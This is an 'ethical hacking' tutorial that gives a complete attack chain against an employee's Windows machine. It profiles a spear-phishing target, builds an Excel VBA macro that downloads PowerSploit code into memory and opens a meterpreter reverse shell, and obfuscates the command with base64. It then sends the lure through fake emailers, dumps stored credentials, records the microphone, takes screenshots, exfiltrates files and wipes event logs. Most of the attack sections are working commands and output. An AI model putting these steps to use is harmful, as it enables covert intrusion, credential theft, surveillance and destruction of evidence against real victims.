PowerShell permits hackers to conduct malevolent actions without using supplemental binary files which boosts their likelihood of successfully permeating their cyber threats without detection. What makes PowerShell an attractive cyber threat tool is it being installed by default on systems.
This ethical hacking tutorial will teach you how to hack and compromise a targeted system and bypass the conventional security defences that are typically deployed in large enterprises. You’ll learn how to create VBA Macro-Based Malware, use phishing for deception, and use Kali Linux to increase the effectiveness of the attack.
Note: This is an ethical hacking tutorial that aims to illustrate how attackers could infiltrate a target’s system by taking advantage of numerous techniques. All information here is for educational and authorized penetration testing purposes only.
This is a demonstration of how an insider attack can be achieved without being detected by anyone.
We will illustrate how spear phishing can be used as an extremely effective attack vector.
Clearly, we are going to need to obtain information regarding our target. OSINT is important.
If we were to launch a spear-phishing campaign, it would be important to find a victim most susceptible to such an attack vector. More significantly, we would need to look for a target that has poor OPSEC which would possibly grant us a better chance of finding information that could be useful to us.
Thus, the ideal spear-phishing target would be an individual that would be more easily deceived in opening the email and perhaps one that is not on a list of “High Profile Users” to ensure that the email is more likely to be received by the recipient.
We could specifically monitor one individual’s social media profiles and look for information that can be used in creating a well-crafted email that will ultimately convince the victim to open not only it but also the attached file as well.
OSINT Stage: How To Find Email Addresses Of Employees Working At Companies Easily
We have a couple of websites that could be utilized to search a victim’s domain which will lead to the organization’s email addresses of employees:
As we can see, the internet offers numerous tools that aid us in conducting the OSINT stage.
2. How To Write Macro Malware Code
First, we are going to download a PowerSploit script from Github:
So we can see that we downloaded the unprocessed version of the script saved in GitHub repositories.
We must embed the script into a Visual Basic for Applications (VBA) Macro Excel Document. The result is that the document will serve as the primary way in compromising the security of the target’s system.
We’re going to now write some Macro code.
♠ Sub Auto_Open() ↔ This basically means that as Microsoft Excel application starts, a macro will run.
♣ Call Shell(“cmd.exe ↔ The code instructs to execute a local Command Prompt.
♥ /c powershell.exe ↔ Directs to execute command for purposes of initiating PowerShell on the victim’s computer.
♦ -noexit ↔ This will hinder the PowerShell console from terminating.
⊕ “IEX (New-Object Net.WebClient) ↔ Essentially, will execute a local IE instance which permits us to bypass proxy authentication.
⊕ DownloadString(‘https://downloadshellcodefromhost’); ↔ This will instruct to download the PowerSploit script from the specified source.
⊗ Invoke-Shellcode ↔ Conjures execution of the script on a local system straightforwardly in memory to elicit the successful bypass of Anti-Virus products.
⊗ -Payload windows/meterpreter/reverse_https ↔ Permits us to deploy the relevant payload.
- -Lhost 127.0.0.1 ↔ Grants us the ability to establish the IP address of our own adversarial machine (Victim would perceive us as an adversary).
- -Lport 443 ↔ Grants us the ability to establish the port where the target’s system will attempt to connect to the adversarial system.
- -Force ↔ Enforcement.
Θ vbHide ↔ Running the command will trigger the concealment of the Command window.
Θ End Sub ↔ End, duh.
Our VBA macro turns out to be this:
|Call Shell(“cmd.exe /c powershell.exe -noexit “”IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”””, vbHide)|
Obviously, replace 127.0.0.1 with your own.
The Excel document was merely detected by 18 AV vendors out of the 60 on VirusTotal which is absurd. This illustrates that reliance on AV signatures is an issue.
|powershell.exe “IEX (New-ObjectNet.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost x.x.x.x -Lport 443 -Force”|
3. Obfuscating The PowerShell Code With Base64 Encoding
Base64 encoding of our script can be achieved like this:
|$command=”IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 127.0.0.1 -Lport 443 -Force”|
|$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)|
|$encodedCommand = [Convert]::ToBase64String($bytes)|
|$encodedCommand >> output.txt|
We can enforce password protection on the script by going to Project Properties > Protection Tab > Under Lock project, tick the box with “Lock project for viewing.” Type in a new password twice. This should make things slightly more difficult for adversarial forensics.
4. Let’s Setup Kali Linux
It’s a good idea to install Kali Linux in a Virtual Machine since it allows us to delete it afterward conveniently.
It’s pretty straightforward to use the Metasploit HTTPs reverse handler:
set Payload windows/meterpreter/reverse_https
set LHOST 127.0.0.1
set LPORT 443
To initiate the handler, remember to type into Terminal: exploit
5. Make A Well-Crafted Spear-Phishing Email & Send It To The Victim
We can use an online fake emailer to send the spear-phishing email to the victim.
Here are two popular fake emailer services:
Do keep in mind that the company of the target employee may utilize enterprise-grade email security services that are likely to incorporate antispam protections to decrease the amount of spam that they receive. Thus, our emails may either be blocked or successfully received by the intended recipient.
Some experimentation with sending the emails successfully is strongly recommended.
6. The Target Gets Tricked And Is Convinced That The Email Is Real
The ideal scenario would be that the target opens the email and believes it is credible, opening the attachment to ‘enable content.’
Our Macro executes the code without the victim even knowing.
We’ll see the following messages in our terminal which indicate that our sessions are successfully opened.
Meterpreter session 1 opened.
Meterpreter session 2 opened.
7. Initiate Your Attacks
Get Windows Shell
Grab the Windows shell by using a command from meterpreter: shell.
We’ll see something similar to this:
meterpreter > shell
Process 1337 created.
Microsoft Windows [Version 1337]
(c) 2018 Microsoft Corporation. All rights reserved.
Proceed by typing the command: whoami
We’ll see the name of the target’s system.
Use WCMDump To Dump Windows Credentials
We can use WCMDump to dump Windows credentials out of Credential Manager for the current victim.
In CMD, type in the following command:
|powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/peewpw/Invoke-WCMDump/master/Invoke-WCMDump.ps1); Invoke-WCMDump”|
Record Audio From The Target’s Microphone Embedded To Their System & Store The Output To A File On The Disk
In CMD, type in the following command:
|powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-MicrophoneAudio.ps1); Get-MicrophoneAudio -Path c:\windows\temp\sunny.wav -Length 10 -Alias “SUNNY”|
As you can see, we are really using Windows API to achieve this.
Audio may serve as an important source of information.
Take Screenshots At A Normal Intermission And Save Screenshots To The Disk Using Exfiltration PowerShell Script
In CMD, use the following command:
|powershell.exe “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-TimedScreenshot.ps1); Get-TimedScreenshot -Path c:\windows\temp\ -Interval 30 -EndTime 18:00”|
This shouldn’t trigger any security events or alerts.
Exfiltrate Sensitive Data By Downloading The Target’s Files On Their Computer
The capability of exfiltrating sensitive data for purposes of cyberespionage and profitability is a popular choice for sophisticated threat actors.
We can download the files from the target’s computer after fulfilling commands and saving the outputs on it by deploying a command from meterpreter: download (file name on victim’s system)
Therefore, it would look like this in terminal:
meterpreter > download c:\\sunny.fextension [*] downloading: c:\sunny.fextension -> c:\sunny.fextension
[*] downloaded : c:\sunny.fextension -> c:\sunny.fextension
8. Clear The Application, System, and Security Logs On The Target’s Windows System.
With meterpreter, we will use the clearev command to clear the logs on the compromised system.
We’ll see something like this:
meterpreter > clearev [*] Wiping 97 records from Application... [*] Wiping 415 records from System... [*] Wiping 0 records from Security... meterpreter >
9. Quit Kali Linux
At this time, we may exit Kali Linux.
10. Delete Kali VM & Erase Hard Disk
A threat actor would likely not merely delete the Kali VM, but also completely erase their hard disk.